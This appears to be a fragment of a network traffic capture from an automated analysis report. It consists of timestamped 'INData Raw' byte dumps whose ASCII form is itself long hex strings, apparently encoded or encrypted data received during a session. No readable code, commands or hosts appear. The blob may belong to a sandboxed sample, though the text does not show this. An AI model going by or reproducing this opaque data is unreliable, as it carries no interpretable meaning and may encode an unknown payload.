                                                                                                                            2022-10-03 14:01:58 UTC1264INData Raw: 36 44 36 36 30 33 36 36 41 44 39 45 31 36 33 42 31 36 36 31 42 46 39 37 31 36 30 42 32 34 43 34 36 41 45 38 30 35 37 46 44 31 46 42 39 34 38 44 41 33 34 42 42 41 44 31 44 46 44 41 32 46 30 45 32 34 46 43 37 39 31 46 31 33 35 39 35 42 44 42 42 31 33 30 35 42 43 44 37 34 39 39 42 30 41 42 36 42 45 46 31 44 31 38 30 45 37 39 38 41 39 46 32 46 43 39 37 30 41 35 38 43 30 39 34 37 35 31 34 33 34 46 32 46 42 34 34 43 44 30 45 43 44 36 37 35 33 35 43 30 30 41 42 37 33 35 43 39 32 33 43 37 41 38 34 39 36 46 30 33 38 39 31 46 37 46 32 45 34 32 42 41 42 39 39 42 35 30 46 39 31 31 32 37 32 42 31 33 45 44 38 39 38 30 37 41 36 44 30 42 34 31 44 34 43 37 31 33 44 31 42 35 43 45 33 30 42 30 45 33 35 31 41 37 37 44 45 36 45 37 34 33 42 43 43 35 37 30 39 46 39 37 33 31 34
                                                                                                                            Data Ascii: 6D660366AD9E163B1661BF97160B24C46AE8057FD1FB948DA34BBAD1DFDA2F0E24FC791F13595BDBB1305BCD7499B0AB6BEF1D180E798A9F2FC970A58C094751434F2FB44CD0ECD67535C00AB735C923C7A8496F03891F7F2E42BAB99B50F911272B13ED89807A6D0B41D4C713D1B5CE30B0E351A77DE6E743BCC5709F97314
                                                                                                                            2022-10-03 14:01:58 UTC1280INData Raw: 43 36 31 31 45 35 41 42 35 35 34 31 33 39 31 33 32 36 36 35 43 39 37 41 37 35 37 46 33 30 36 46 31 39 45 30 34 35 41 38 39 30 43 42 43 41 37 30 35 44 46 39 34 46 36 30 30 30 38 46 42 41 43 46 34 42 33 36 43 37 33 37 41 44 43 44 36 39 36 39 39 46 36 43 41 39 37 37 32 46 44 46 32 45 43 38 37 46 42 37 33 42 45 42 34 31 35 34 35 46 35 38 33 37 37 30 43 33 33 33 33 45 43 36 38 46 45 42 31 35 31 34 30 32 45 44 30 32 32 33 33 46 45 31 45 46 36 30 35 36 36 44 46 32 33 44 35 43 32 41 42 46 42 33 34 31 45 38 34 36 31 38 41 37 38 45 45 36 46 36 34 34 31 31 39 41 36 44 32 42 37 35 43 45 36 45 32 31 30 32 38 39 45 30 41 36 30 34 45 31 35 44 43 45 30 39 37 43 38 30 39 44 37 36 45 46 44 46 34 33 34 44 32 45 30 33 33 38 36 33 41 31 31 35 41 45 37 45 33 34 45 32 35 32 42
                                                                                                                            Data Ascii: C611E5AB554139132665C97A757F306F19E045A890CBCA705DF94F60008FBACF4B36C737ADCD69699F6CA9772FDF2EC87FB73BEB41545F583770C3333EC68FEB151402ED02233FE1EF60566DF23D5C2ABFB341E84618A78EE6F644119A6D2B75CE6E210289E0A604E15DCE097C809D76EFDF434D2E033863A115AE7E34E252B
                                                                                                                            2022-10-03 14:01:58 UTC1296INData Raw: 39 36 34 33 41 31 42 32 33 37 39 45 35 30 33 41 35 35 43 39 42 36 45 30 38 31 30 34 30 34 42 33 44 35 42 39 42 39 37 30 32 36 35 36 31 35 37 35 39 30 32 46 41 37 32 32 41 35 42 39 36 41 38 38 44 44 36 39 35 34 34 38 33 35 33 46 45 43 36 30 41 31 44 39 33 44 33 44 35 32 30 38 45 43 33 35 42 42 45 30 31 36 44 46 35 31 41 32 43 44 35 46 36 39 41 43 30 45 31 37 46 38 45 30 41 34 37 35 34 43 33 37 38 41 30 45 35 39 41 33 30 44 46 42 41 31 35 38 46 41 41 33 42 44 31 46 45 43 32 33 31 31 38 37 42 41 34 30 44 36 46 30 45 33 46 42 37 42 37 44 42 44 32 36 44 46 42 32 45 31 36 33 35 44 32 39 42 30 44 36 44 32 33 35 34 32 41 31 42 36 41 44 35 38 32 39 31 39 35 38 35 30 44 32 37 45 42 32 31 34 38 30 30 35 37 30 34 42 34 35 36 39 39 30 35 46 39 39 41 46 38 35 45 42 34
                                                                                                                            Data Ascii: 9643A1B2379E503A55C9B6E0810404B3D5B9B97026561575902FA722A5B96A88DD695448353FEC60A1D93D3D5208EC35BBE016DF51A2CD5F69AC0E17F8E0A4754C378A0E59A30DFBA158FAA3BD1FEC231187BA40D6F0E3FB7B7DBD26DFB2E1635D29B0D6D23542A1B6AD5829195850D27EB2148005704B4569905F99AF85EB4
                                                                                                                            2022-10-03 14:01:59 UTC1312INData Raw: 42 37 32 46 46 41 32 46 35 30 32 41 39 45 30 36 45 42 45 46 45 38 42 44 35 38 36 36 39 33 35 43 39 45 44 31 39 45 45 44 34 36 31 46 37 35 33 39 36 42 32 37 46 34 38 31 41 35 43 43 39 38 44 35 38 46 35 38 43 33 31 32 37 37 37 32 36 43 39 45 44 34 35 39 36 36 45 45 33 31 33 35 44 31 45 38 31 32 45 30 30 31 39 42 43 37 34 38 38 37 39 44 39 38 38 36 41 33 41 35 44 30 44 38 46 42 39 33 35 42 46 45 31 44 42 45 36 39 32 45 41 46 42 46 35 41 38 30 36 45 38 44 43 30 44 39 31 37 42 37 36 30 35 32 44 41 45 36 32 41 35 44 38 45 41 37 44 35 31 36 44 32 43 32 35 35 30 31 39 37 46 30 32 32 45 37 45 44 39 41 46 42 41 34 35 41 41 42 34 31 38 45 46 43 34 37 46 33 41 46 43 43 32 44 44 46 34 42 38 39 43 38 42 41 34 30 46 34 38 37 30 41 30 34 35 30 31 36 42 32 45 35 42 42 36
                                                                                                                            Data Ascii: B72FFA2F502A9E06EBEFE8BD5866935C9ED19EED461F75396B27F481A5CC98D58F58C31277726C9ED45966EE3135D1E812E0019BC748879D9886A3A5D0D8FB935BFE1DBE692EAFBF5A806E8DC0D917B76052DAE62A5D8EA7D516D2C2550197F022E7ED9AFBA45AAB418EFC47F3AFCC2DDF4B89C8BA40F4870A045016B2E5BB6
                                                                                                                            2022-10-03 14:01:59 UTC1328INData Raw: 33 32 30 44 44 30 37 42 33 43 38 43 33 31 35 31 46 39 46 44 30 44 45 43 35 30 43 45 36 44 41 45 33 43 35 37 30 46 30 37 33 38 34 38 34 46 34 42 39 43 39 35 33 46 31 30 45 36 31 42 39 41 38 33 36 39 41 36 31 38 38 36 45 39 38 45 46 35 44 43 44 41 37 39 44 37 43 38 42 44 37 34 34 35 45 32 34 31 35 41 30 46 44 39 45 34 45 38 36 31 38 33 44 45 46 46 38 43 31 44 41 31 36 37 41 41 41 35 36 38 31 44 33 34 38 30 34 33 46 37 43 30 30 45 39 46 32 39 41 37 44 44 30 42 33 32 36 37 45 42 37 31 36 34 33 41 44 35 44 31 30 30 39 43 45 37 33 39 34 41 44 39 38 45 34 35 46 39 41 43 37 46 45 34 32 42 36 42 30 31 43 38 37 37 43 37 34 35 36 31 37 42 35 42 41 39 39 30 44 38 43 46 39 41 31 38 31 39 42 42 31 37 42 38 44 41 46 30 43 31 41 42 37 37 44 32 37 35 34 37 44 32 33 36 35
                                                                                                                            Data Ascii: 320DD07B3C8C3151F9FD0DEC50CE6DAE3C570F0738484F4B9C953F10E61B9A8369A61886E98EF5DCDA79D7C8BD7445E2415A0FD9E4E86183DEFF8C1DA167AAA5681D348043F7C00E9F29A7DD0B3267EB71643AD5D1009CE7394AD98E45F9AC7FE42B6B01C877C745617B5BA990D8CF9A1819BB17B8DAF0C1AB77D27547D2365
                                                                                                                            2022-10-03 14:01:59 UTC1344INData Raw: 35 32 45 34 46 32 30 43 44 30 44 37 34 37 43 46 43 32 34 42 45 45 31 32 36 38 36 45 43 32 36 41 32 35 33 44 36 36 38 33 34 44 45 33 30 45 44 42 46 33 43 46 33 38 43 45 43 38 32 42 41 34 32 44 38 36 43 37 41 30 37 34 38 35 35 35 31 38 30 46 35 34 39 30 46 46 39 41 41 34 34 41 42 37 33 39 43 44 44 31 34 41 34 41 38 31 32 36 34 39 30 30 46 33 44 31 38 34 39 33 36 34 36 35 45 31 43 44 42 30 37 33 36 33 36 36 34 31 46 33 41 36 43 31 35 41 41 38 45 30 39 30 45 37 43 39 32 35 46 34 39 38 37 35 39 44 46 30 41 45 38 34 45 30 35 37 41 41 45 31 32 36 46 44 38 45 38 36 33 46 35 46 30 32 36 32 36 46 44 38 31 44 36 44 34 44 31 30 32 41 32 31 44 45 38 44 38 36 30 31 36 36 45 35 37 42 38 39 45 33 46 31 34 36 33 30 42 32 38 38 39 33 33 39 41 46 32 37 44 45 41 32 30 45 32
                                                                                                                            Data Ascii: 52E4F20CD0D747CFC24BEE12686EC26A253D66834DE30EDBF3CF38CEC82BA42D86C7A0748555180F5490FF9AA44AB739CDD14A4A81264900F3D184936465E1CDB073636641F3A6C15AA8E090E7C925F498759DF0AE84E057AAE126FD8E863F5F02626FD81D6D4D102A21DE8D860166E57B89E3F14630B2889339AF27DEA20E2
                                                                                                                            2022-10-03 14:01:59 UTC1360INData Raw: 32 45 43 46 30 44 43 33 37 43 44 35 46 39 32 31 42 38 32 31 38 45 42 33 45 43 37 38 43 46 38 46 34 36 43 39 41 42 34 35 31 30 43 41 37 35 41 42 41 32 41 46 35 37 32 43 30 38 38 39 43 37 33 45 42 45 42 30 39 46 45 38 30 33 33 35 35 38 39 34 42 33 37 45 43 30 35 35 42 35 36 34 33 41 41 33 42 45 33 36 43 37 37 38 42 37 32 45 44 30 41 43 37 45 34 31 33 36 44 33 36 32 37 43 32 44 32 31 34 45 44 44 41 32 46 33 30 42 41 46 33 43 38 42 46 35 44 31 46 37 38 32 37 46 35 37 44 32 42 46 35 32 37 41 42 46 37 41 30 31 41 31 36 44 33 35 30 35 39 30 44 44 43 30 43 44 37 39 36 33 44 42 41 37 32 32 45 32 34 43 32 37 30 33 41 42 37 42 31 44 44 42 32 44 43 41 44 46 33 32 33 43 34 34 31 30 44 43 33 36 32 34 45 46 43 46 30 35 37 34 35 41 46 39 41 45 35 37 42 39 37 41 36 30 33
                                                                                                                            Data Ascii: 2ECF0DC37CD5F921B8218EB3EC78CF8F46C9AB4510CA75ABA2AF572C0889C73EBEB09FE803355894B37EC055B5643AA3BE36C778B72ED0AC7E4136D3627C2D214EDDA2F30BAF3C8BF5D1F7827F57D2BF527ABF7A01A16D350590DDC0CD7963DBA722E24C2703AB7B1DDB2DCADF323C4410DC3624EFCF05745AF9AE57B97A603
                                                                                                                            2022-10-03 14:01:59 UTC1376INData Raw: 38 46 44 41 32 32 38 30 41 31 42 35 45 37 38 32 31 45 44 43 41 44 31 46 41 45 44 34 39 39 35 33 45 43 33 30 44 33 32 32 34 46 33 42 36 38 33 44 41 42 34 43 34 33 31 36 34 38 35 44 45 43 38 37 34 32 39 30 38 45 36 43 37 38 44 39 35 35 43 31 39 42 43 32 38 34 45 43 37 44 35 39 37 46 46 31 44 38 44 39 33 36 38 35 35 35 44 39 43 46 32 32 30 31 41 43 44 38 38 43 42 33 45 44 30 36 45 44 42 31 34 43 35 45 31 37 36 46 42 33 46 36 45 45 39 44 45 30 38 44 30 31 36 31 30 30 39 42 41 38 33 41 36 38 35 33 37 32 46 37 36 42 43 37 46 41 30 37 42 34 34 39 34 39 32 30 46 34 41 31 45 32 33 41 37 38 45 38 43 31 37 45 36 45 43 35 45 45 45 46 34 35 37 35 45 46 38 38 45 36 39 41 35 36 41 33 34 45 35 46 34 41 34 38 32 31 43 33 41 41 35 42 36 36 39 45 35 36 34 44 44 42 35 42 35
                                                                                                                            Data Ascii: 8FDA2280A1B5E7821EDCAD1FAED49953EC30D3224F3B683DAB4C4316485DEC8742908E6C78D955C19BC284EC7D597FF1D8D9368555D9CF2201ACD88CB3ED06EDB14C5E176FB3F6EE9DE08D0161009BA83A685372F76BC7FA07B4494920F4A1E23A78E8C17E6EC5EEEF4575EF88E69A56A34E5F4A4821C3AA5B669E564DDB5B5
                                                                                                                            2022-10-03 14:01:59 UTC1392INData Raw: 36 44 33 39 33 41 30 45 35 42 41 45 46 43 43 39 44 42 32 36 39 33 43 30 37 35 30 37 37 37 44 36 34 46 31 32 34 35 39 35 36 37 34 31 36 33 34 30 37 34 31 30 39 39 31 42 35 36 36 35 41 46 35 31 33 39 32 43 38 36 43 44 36 42 35 35 46 41 35 43 32 37 32 30 30 37 41 41 35 30 44 44 30 30 36 35 41 33 37 44 36 43 46 43 32 38 43 33 44 35 46 32 38 44 32 43 41 38 42 44 45 46 34 46 33 46 32 43 45 36 32 30 41 44 41 46 46 35 39 30 39 46 42 46 38 41 31 45 35 41 37 33 31 31 41 42 35 32 39 39 46 37 31 37 42 36 38 42 41 45 43 43 43 30 30 39 43 38 45 31 32 39 44 42 32 36 35 42 37 42 36 37 33 42 37 41 39 45 38 34 33 36 37 44 45 45 42 41 38 34 36 38 43 44 42 32 44 37 44 43 32 35 41 39 42 42 42 34 31 36 32 32 41 31 31 32 41 45 33 36 41 32 38 35 38 30 46 46 44 39 35 36 30 42 35
                                                                                                                            Data Ascii: 6D393A0E5BAEFCC9DB2693C0750777D64F124595674163407410991B5665AF51392C86CD6B55FA5C272007AA50DD0065A37D6CFC28C3D5F28D2CA8BDEF4F3F2CE620ADAFF5909FBF8A1E5A7311AB5299F717B68BAECCC009C8E129DB265B7B673B7A9E84367DEEBA8468CDB2D7DC25A9BBB41622A112AE36A28580FFD9560B5
                                                                                                                            2022-10-03 14:01:59 UTC1408INData Raw: 44 43 39 38 31 33 37 33 45 34 34 45 43 42 44 41 46 41 32 38 37 43 34 44 43 37 35 32 35 36 30 34 41 38 43 39 38 35 31 42 30 31 42 33 38 41 31 33 30 41 42 35 38 46 46 42 31 39 35 44 46 30 35 30 35 30 30 36 45 36 32 37 33 39 43 30 42 46 44 30 43 31 31 30 31 44 35 37 41 34 31 42 30 32 31 45 43 43 46 33 34 34 37 37 33 41 39 46 44 35 42 36 36 36 45 41 46 32 34 41 33 41 42 42 45 30 34 45 45 45 42 42 34 43 32 38 36 31 31 46 41 36 45 44 43 43 34 33 32 35 32 45 44 42 36 44 44 39 34 32 43 37 34 35 45 45 38 42 36 41 38 37 36 32 39 31 31 42 46 32 34 41 35 38 45 43 41 32 31 38 36 44 41 38 36 34 41 33 37 34 35 46 35 37 35 42 30 32 37 41 36 43 46 46 33 42 46 31 42 44 31 46 34 33 42 44 43 42 33 33 32 44 46 45 41 34 32 34 41 43 35 46 34 31 35 42 45 46 34 36 39 46 46 33 46
                                                                                                                            Data Ascii: DC981373E44ECBDAFA287C4DC7525604A8C9851B01B38A130AB58FFB195DF0505006E62739C0BFD0C1101D57A41B021ECCF344773A9FD5B666EAF24A3ABBE04EEEBB4C28611FA6EDCC43252EDB6DD942C745EE8B6A8762911BF24A58ECA2186DA864A3745F575B027A6CFF3BF1BD1F43BDCB332DFEA424AC5F415BEF469FF3F
                                                                                                                            2022-10-03 14:01:59 UTC1424INData Raw: 41 42 44 32 38 34 39 34 42 31 44 38 37 38 46 44 33 43 36 34 43 33 43 36 41 39 43 39 42 30 39 30 30 33 46 31 35 35 44 41 36 45 45 32 32 33 37 42 37 32 45 37 32 38 46 42 42 45 34 31 43 33 41 35 37 35 30 39 38 42 32 30 42 39 39 32 36 34 46 44 43 37 30 33 35 30 44 42 36 38 32 34 35 41 37 45 31 43 38 43 31 38 35 46 44 42 44 42 36 44 46 34 35 30 34 38 36 43 39 46 30 46 35 43 33 46 37 34 41 43 45 46 42 35 39 33 31 44 42 36 38 44 36 42 36 42 33 33 36 32 38 45 43 36 38 38 38 30 42 32 38 33 33 39 42 32 43 37 46 36 39 45 46 44 33 43 46 32 33 30 39 33 43 34 33 35 35 41 44 39 45 37 46 38 44 44 43 45 31 43 42 38 42 36 45 42 37 30 46 31 37 44 37 37 44 39 46 46 36 46 46 32 34 30 42 30 43 44 43 45 39 41 30 38 45 37 38 41 30 42 46 42 43 30 37 35 39 37 33 34 33 38 38 43 41
                                                                                                                            Data Ascii: ABD28494B1D878FD3C64C3C6A9C9B09003F155DA6EE2237B72E728FBBE41C3A575098B20B99264FDC70350DB68245A7E1C8C185FDBDB6DF450486C9F0F5C3F74ACEFB5931DB68D6B6B33628EC68880B28339B2C7F69EFD3CF23093C4355AD9E7F8DDCE1CB8B6EB70F17D77D9FF6FF240B0CDCE9A08E78A0BFBC0759734388CA
                                                                                                                            2022-10-03 14:01:59 UTC1440INData Raw: 31 44 31 34 44 39 37 36 45 34 33 37 34 39 32 45 32 35 37 32 44 45 35 37 31 30 42 43 38 42 38 45 30 38 32 39 43 32 45 30 46 41 44 33 33 30 31 36 33 43 42 33 37 44 39 37 42 35 34 39 36 44 35 36 38 41 42 37 42 43 37 42 42 41 41 37 36 36 31 30 37 38 36 42 31 34 35 38 39 35 38 35 33 41 36 36 35 44 41 42 42 43 31 30 38 42 45 44 30 33 42 44 34 32 37 44 39 38 35 44 46 30 43 31 43 37 34 30 31 38 44 42 37 45 46 30 45 36 39 32 33 45 46 46 30 44 31 45 36 37 34 35 30 37 34 39 43 34 34 41 46 35 39 31 30 34 30 43 34 43 39 31 44 32 41 41 30 37 39 36 45 30 44 35 35 44 45 41 43 42 36 33 30 43 34 30 45 41 42 33 44 32 37 41 45 45 45 46 31 32 33 44 33 35 44 38 44 45 36 45 39 43 34 38 32 43 45 43 31 30 43 35 38 41 36 45 36 39 34 30 31 46 38 46 44 42 39 33 39 31 45 34 41 45 38
                                                                                                                            Data Ascii: 1D14D976E437492E2572DE5710BC8B8E0829C2E0FAD330163CB37D97B5496D568AB7BC7BBAA76610786B145895853A665DABBC108BED03BD427D985DF0C1C74018DB7EF0E6923EFF0D1E67450749C44AF591040C4C91D2AA0796E0D55DEACB630C40EAB3D27AEEEF123D35D8DE6E9C482CEC10C58A6E69401F8FDB9391E4AE8
                                                                                                                            2022-10-03 14:01:59 UTC1456INData Raw: 37 36 37 38 46 38 39 43 46 43 33 45 30 31 36 34 37 31 37 31 38 31 35 34 46 44 30 35 30 34 34 37 41 31 33 44 36 37 43 42 45 41 32 37 37 45 46 44 34 43 32 33 36 30 45 45 37 33 42 42 38 36 37 37 41 30 42 31 46 35 45 33 36 41 38 30 31 37 46 33 45 31 41 44 35 36 38 46 45 39 35 44 44 46 41 42 35 44 30 30 38 30 37 42 30 37 39 44 35 37 38 32 45 34 33 45 36 42 42 32 37 42 32 39 34 39 38 46 33 33 36 35 44 41 39 42 31 43 32 46 41 42 39 30 34 44 46 37 30 36 33 36 39 37 46 46 30 34 32 31 45 45 30 39 44 42 44 46 33 45 43 39 42 33 35 32 32 39 46 42 32 34 31 34 31 30 43 42 31 34 33 37 30 32 41 42 43 43 30 46 41 44 45 39 33 33 44 39 30 41 33 32 30 38 34 39 32 33 37 36 43 31 36 45 33 42 36 32 32 39 37 46 44 34 44 39 32 37 43 46 37 34 30 36 45 36 41 32 41 33 38 42 36 31 45
                                                                                                                            Data Ascii: 7678F89CFC3E016471718154FD050447A13D67CBEA277EFD4C2360EE73BB8677A0B1F5E36A8017F3E1AD568FE95DDFAB5D00807B079D5782E43E6BB27B29498F3365DA9B1C2FAB904DF7063697FF0421EE09DBDF3EC9B35229FB241410CB143702ABCC0FADE933D90A3208492376C16E3B62297FD4D927CF7406E6A2A38B61E
                                                                                                                            2022-10-03 14:01:59 UTC1472INData Raw: 41 33 31 30 41 36 30 35 39 45 42 35 44 36 41 33 42 36 36 34 30 42 45 33 33 37 43 31 43 34 42 39 33 35 33 43 36 43 34 38 45 43 41 30 44 32 32 33 37 42 33 33 32 33 44 36 41 30 37 36 46 30 36 41 41 33 44 32 36 41 41 31 31 32 45 31 34 39 39 44 44 38 31 46 34 34 43 46 35 37 30 33 37 30 42 39 39 43 42 34 38 39 33 38 31 44 38 31 41 46 41 34 38 34 44 37 46 36 41 35 33 33 42 30 30 31 33 37 46 45 45 41 31 32 45 31 39 37 42 36 30 30 41 44 44 32 46 44 39 41 32 37 34 34 35 30 35 36 37 34 37 45 44 34 44 37 32 46 36 44 45 39 45 46 45 37 37 31 35 33 41 33 41 30 46 45 32 30 44 42 36 44 46 39 34 32 37 31 34 46 35 45 33 42 34 36 37 38 38 37 35 43 37 38 46 43 41 37 46 44 45 42 46 32 31 37 44 36 35 43 34 38 37 42 35 33 30 44 37 44 42 33 30 33 37 36 45 39 38 45 42 36 33 41 44
                                                                                                                            Data Ascii: A310A6059EB5D6A3B6640BE337C1C4B9353C6C48ECA0D2237B3323D6A076F06AA3D26AA112E1499DD81F44CF570370B99CB489381D81AFA484D7F6A533B00137FEEA12E197B600ADD2FD9A27445056747ED4D72F6DE9EFE77153A3A0FE20DB6DF942714F5E3B4678875C78FCA7FDEBF217D65C487B530D7DB30376E98EB63AD
                                                                                                                            2022-10-03 14:01:59 UTC1488INData Raw: 31 43 38 30 41 41 41 45 36 39 35 39 30 35 38 45 36 42 42 31 31 36 37 43 36 46 46 39 45 43 45 39 43 45 39 42 42 38 41 39 43 46 33 39 36 42 44 33 36 30 42 31 43 35 32 30 42 46 32 44 41 37 43 38 44 31 41 44 37 43 41 32 44 41 31 38 41 39 37 41 46 35 39 42 43 43 31 44 30 42 32 39 30 30 44 38 45 42 31 30 39 45 39 35 41 36 44 41 35 35 39 32 44 41 44 36 38 31 37 34 44 34 46 46 46 45 45 37 41 43 35 42 42 39 36 33 35 32 35 36 30 34 46 36 37 36 31 39 39 46 43 42 42 39 30 43 46 46 45 35 46 31 34 31 36 35 35 31 42 35 32 46 33 30 35 35 35 32 31 37 43 33 35 38 39 45 32 46 43 31 34 34 33 38 38 39 46 43 41 35 31 42 35 38 41 34 33 35 39 37 42 46 34 43 46 36 38 34 34 46 35 38 41 33 35 46 31 43 38 34 46 32 43 43 41 32 39 37 33 31 37 44 33 34 41 34 44 35 36 42 34 42 44 35 35
                                                                                                                            Data Ascii: 1C80AAAE6959058E6BB1167C6FF9ECE9CE9BB8A9CF396BD360B1C520BF2DA7C8D1AD7CA2DA18A97AF59BCC1D0B2900D8EB109E95A6DA5592DAD68174D4FFFEE7AC5BB963525604F676199FCBB90CFFE5F1416551B52F30555217C3589E2FC1443889FCA51B58A43597BF4CF6844F58A35F1C84F2CCA297317D34A4D56B4BD55
                                                                                                                            2022-10-03 14:01:59 UTC1504INData Raw: 38 33 45 37 34 41 43 33 43 42 34 35 45 31 30 46 39 39 42 34 42 42 39 39 31 39 36 42 33 37 33 32 43 43 45 32 38 34 42 37 44 37 39 42 34 39 30 39 32 30 38 35 44 46 43 41 44 35 41 39 43 39 34 45 39 32 41 30 35 32 38 36 36 38 43 31 32 44 37 43 31 30 38 31 45 46 41 34 42 39 34 42 32 38 41 43 43 41 46 42 45 41 41 34 33 46 46 44 39 39 46 43 44 34 34 31 38 36 44 35 39 37 32 44 36 32 35 42 41 35 46 38 37 45 44 43 30 46 32 30 36 30 33 30 35 46 34 30 34 37 31 43 32 44 43 35 32 36 39 32 45 44 34 32 41 37 30 33 33 37 45 39 37 32 46 46 44 46 46 36 42 38 33 43 33 30 33 31 46 36 36 35 41 44 44 41 46 31 38 37 45 45 36 37 38 36 35 43 42 43 39 38 31 30 38 41 38 37 43 31 42 43 38 38 35 42 41 41 36 31 35 46 32 37 36 30 37 34 31 37 46 46 46 34 41 39 42 33 31 44 41 41 38 32 45
                                                                                                                            Data Ascii: 83E74AC3CB45E10F99B4BB99196B3732CCE284B7D79B49092085DFCAD5A9C94E92A0528668C12D7C1081EFA4B94B28ACCAFBEAA43FFD99FCD44186D5972D625BA5F87EDC0F2060305F40471C2DC52692ED42A70337E972FFDFF6B83C3031F665ADDAF187EE67865CBC98108A87C1BC885BAA615F27607417FFF4A9B31DAA82E
                                                                                                                            2022-10-03 14:01:59 UTC1520INData Raw: 34 42 31 38 33 41 32 41 42 42 33 46 31 44 33 30 37 45 44 46 42 41 46 46 34 33 43 38 36 36 33 36 41 41 46 44 39 43 45 34 46 31 33 38 44 35 31 31 42 39 32 43 42 31 39 34 38 42 43 33 41 45 36 35 30 30 37 37 36 32 38 36 37 30 46 41 35 31 30 42 30 31 36 31 33 41 36 46 37 35 32 45 31 41 38 43 38 43 33 41 43 42 34 30 36 36 30 43 32 35 35 42 34 41 33 45 45 34 31 31 34 34 43 44 43 43 36 42 31 31 41 34 37 39 35 46 43 32 31 43 32 39 46 31 33 39 46 32 44 45 46 43 45 32 39 45 34 46 30 45 42 32 30 34 39 37 41 46 37 37 41 30 36 43 41 43 39 35 42 41 39 35 38 31 30 32 41 35 36 30 30 35 30 44 46 31 44 45 35 42 46 32 43 35 44 44 42 39 31 32 43 42 45 33 39 38 32 32 43 37 46 39 37 36 30 37 33 38 44 35 42 34 31 30 43 45 43 46 36 34 44 42 30 31 44 42 30 44 35 42 45 34 30 35 45
                                                                                                                            Data Ascii: 4B183A2ABB3F1D307EDFBAFF43C86636AAFD9CE4F138D511B92CB1948BC3AE650077628670FA510B01613A6F752E1A8C8C3ACB40660C255B4A3EE41144CDCC6B11A4795FC21C29F139F2DEFCE29E4F0EB20497AF77A06CAC95BA958102A560050DF1DE5BF2C5DDB912CBE39822C7F9760738D5B410CECF64DB01DB0D5BE405E
                                                                                                                            2022-10-03 14:01:59 UTC1536INData Raw: 42 43 34 30 41 34 41 42 34 30 38 31 38 33 39 44 36 34 41 36 37 37 43 41 44 32 35 37 34 31 46 34 42 33 46 35 33 34 41 43 41 46 33 36 38 33 41 46 43 35 38 46 46 42 45 37 30 32 35 36 39 43 30 33 30 33 41 39 30 30 34 43 36 37 44 37 37 31 37 31 34 31 43 38 34 33 33 44 45 44 30 34 37 38 37 37 45 45 46 45 30 41 35 44 37 33 37 34 39 41 45 36 30 44 46 33 33 38 32 39 39 42 36 39 34 44 36 32 34 42 36 39 43 35 41 38 33 43 37 41 31 35 34 42 37 42 39 34 30 38 35 33 33 37 43 38 44 37 39 45 34 44 37 30 41 46 35 41 32 33 39 30 30 38 43 46 42 36 35 41 36 42 38 44 45 37 32 39 36 39 46 35 45 39 37 35 43 36 37 42 34 41 35 42 35 43 31 42 46 46 45 37 33 45 42 30 30 31 41 32 30 36 34 44 43 46 31 36 46 39 42 46 33 34 30 33 45 37 45 37 41 46 39 46 43 30 38 35 34 30 35 37 42 42 42
                                                                                                                            Data Ascii: BC40A4AB4081839D64A677CAD25741F4B3F534ACAF3683AFC58FFBE702569C0303A9004C67D7717141C8433DED047877EEFE0A5D73749AE60DF338299B694D624B69C5A83C7A154B7B94085337C8D79E4D70AF5A239008CFB65A6B8DE72969F5E975C67B4A5B5C1BFFE73EB001A2064DCF16F9BF3403E7E7AF9FC0854057BBB
                                                                                                                            2022-10-03 14:01:59 UTC1552INData Raw: 38 38 42 33 36 45 39 33 32 33 41 35 37 39 30 30 32 30 39 44 41 32 45 39 36 37 46 39 42 30 38 39 42 35 44 37 35 42 46 33 44 34 33 46 44 39 39 32 37 41 34 46 42 44 46 44 46 32 45 37 34 46 35 44 36 32 30 41 37 39 43 31 38 43 33 33 32 33 30 34 32 33 38 43 43 45 34 35 46 33 30 44 36 46 37 46 30 31 32 38 32 32 43 44 43 30 38 32 45 36 35 42 41 44 45 38 35 31 38 38 45 39 42 32 46 30 37 46 34 37 34 44 39 37 32 45 42 46 46 34 38 39 43 37 36 34 39 34 34 39 39 45 41 32 32 38 36 41 38 41 36 37 32 41 34 46 43 38 42 32 45 41 33 38 34 42 32 37 36 38 38 42 45 37 33 30 45 44 45 39 41 30 41 39 33 45 41 45 43 36 38 32 35 35 36 31 43 32 44 31 43 39 43 31 43 37 39 30 33 37 33 30 44 31 39 33 39 31 42 41 33 39 41 45 33 33 32 43 45 39 31 45 42 35 38 43 43 39 43 39 35 37 33 39 43
                                                                                                                            Data Ascii: 88B36E9323A57900209DA2E967F9B089B5D75BF3D43FD9927A4FBDFDF2E74F5D620A79C18C332304238CCE45F30D6F7F012822CDC082E65BADE85188E9B2F07F474D972EBFF489C76494499EA2286A8A672A4FC8B2EA384B27688BE730EDE9A0A93EAEC6825561C2D1C9C1C7903730D19391BA39AE332CE91EB58CC9C95739C
                                                                                                                            2022-10-03 14:01:59 UTC1568INData Raw: 35 34 45 38 33 39 43 37 32 35 35 44 30 46 37 34 46 31 32 33 38 45 46 44 42 36 46 42 39 34 36 34 43 30 30 46 35 34 41 43 34 35 45 38 46 32 42 32 30 33 33 30 41 36 41 34 34 41 41 37 39 46 38 34 39 38 38 42 41 46 45 42 39 43 30 45 37 37 38 30 38 39 43 36 30 31 45 38 39 36 42 38 43 30 46 35 42 44 45 39 39 33 43 43 33 30 46 38 45 31 45 46 38 44 46 42 44 39 44 43 31 46 38 38 36 37 39 37 34 34 42 30 33 45 36 39 43 44 42 44 35 42 34 31 38 38 46 34 37 46 36 31 30 32 45 31 43 45 33 31 31 43 30 45 46 34 33 37 30 38 32 34 31 32 35 43 34 43 37 31 41 39 44 36 39 30 37 42 33 43 30 36 35 46 33 39 42 35 44 37 41 31 45 33 45 35 39 38 37 41 44 42 44 44 39 45 30 44 39 42 32 44 42 41 33 30 43 37 30 45 35 38 38 44 35 32 31 36 43 42 35 45 46 30 37 31 45 46 32 32 38 41 34 42 30
                                                                                                                            Data Ascii: 54E839C7255D0F74F1238EFDB6FB9464C00F54AC45E8F2B20330A6A44AA79F84988BAFEB9C0E778089C601E896B8C0F5BDE993CC30F8E1EF8DFBD9DC1F88679744B03E69CDBD5B4188F47F6102E1CE311C0EF4370824125C4C71A9D6907B3C065F39B5D7A1E3E5987ADBDD9E0D9B2DBA30C70E588D5216CB5EF071EF228A4B0
